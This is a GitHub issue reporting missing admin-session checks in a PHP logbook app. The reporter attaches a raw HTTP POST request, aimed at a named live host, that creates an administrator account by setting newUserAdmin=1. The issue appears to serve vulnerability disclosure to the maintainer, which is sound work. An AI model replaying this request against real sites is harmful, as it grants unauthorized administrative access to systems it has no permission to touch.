### ISSUE TITLE
Admin functions are unprotected

### ISSUE THREAD

**Issue by gianklug** [Lugigiiii/logbook#2]
There is no check for the `$_SESSION["admin"]` property on most pages, thus unprivileged users can just create an Admin account as demonstrated below: 

```yaml
POST /resources/php/functions/main-functions.php HTTP/2
Host: logbook.lacasaverde.ch
Cookie: PHPSESSID=<redacted>
Content-Length: 78
Cache-Control: max-age=0
Sec-Ch-Ua: "Not:A-Brand";v="99", "Chromium";v="112"
Origin: https://logbook.lacasaverde.ch
Sec-Ch-Ua-Mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.50 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Ch-Ua-Platform: "Windows"
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-Dest: empty
Referer: https://logbook.lacasaverde.ch/index.php?view=admin-users
Accept-Encoding: gzip, deflate
Accept-Language: de-DE,de;q=0.9,en-US;q=0.8,en;q=0.7

newUserFirst=Get&newUserLast=Hacked&newUserName=test&newUserMail=test%40gk.wtf&newUserAdmin=1
```
